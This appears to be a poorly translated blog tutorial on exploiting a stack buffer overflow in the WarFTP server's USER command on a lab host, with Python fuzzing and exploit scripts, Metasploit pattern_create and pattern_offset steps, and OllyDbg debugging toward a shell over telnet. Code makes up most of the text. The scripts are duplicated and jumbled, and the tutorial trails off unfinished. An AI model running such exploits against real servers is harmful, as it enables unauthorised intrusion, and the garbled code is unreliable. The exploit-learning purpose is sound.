then we make a python script in advance:by typing the command kwrite xfuzz.py and apper picture
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x41" * 1000
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("Sendingevildatavia USER command....")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
open Warftp and click button with a picture of lightning at the far left image
then run warftp in OllyDbg pass write order #python xfuzz.py and the end result
then we exploid with write cd /pentest/exploits/framework/tools
after admission we write order ./pattern_create.rb 1000 > string_pattern.txt after that crite kwrite xfuzz.py
see for yourself later on the script, yes, .... (^_^)
then we write other ./pattern_offset.rb 32714131 then appear image
the write frequent other ./pattern_offset.rb q4Aq5Aq
continue we edit other in xfuzz.py and appear other
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
nilaiEIP= "\x90" * 485
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
nilaiEIP= "\x90" * 485
nilaiEIP+= "\xEF\xBE\xAD\xDE"
s.connect(('192.168.56.101',21))
data=s.recv(1024)
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("Sendingevildatavia USER command....")
s.send('USER '+nilaiEIP+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
s.send('USER '+nilaiEIP+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
then turn up image:
continue edit again zfuzz.py the result is :
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x90" * 485
buffer+="\x65\x82\xA5\x7C"
buffer+="\xCC" * (493-len(buffer))
buffer+="\xCC" * (1000 - len(buffer))
s.connect(('192.168.56.101',21))
data=s.recv(1024)
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x90" * 485
buffer+="\x65\x82\xA5\x7C"
buffer+="\xCC" * (493-len(buffer))
buffer+="\xCC" * (1000 - len(buffer))
s.connect(('192.168.56.101',21))
data=s.recv(1024)
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
and appear picture :
further run ollydbg and click menu view --> then click executable modules
after than search write the rear SHELL32
and live call by using the telnet. open Warfp that there futher click online in button image in left
then we write
we write telnet with other
MORE TRY HARDER!!
BalasHapus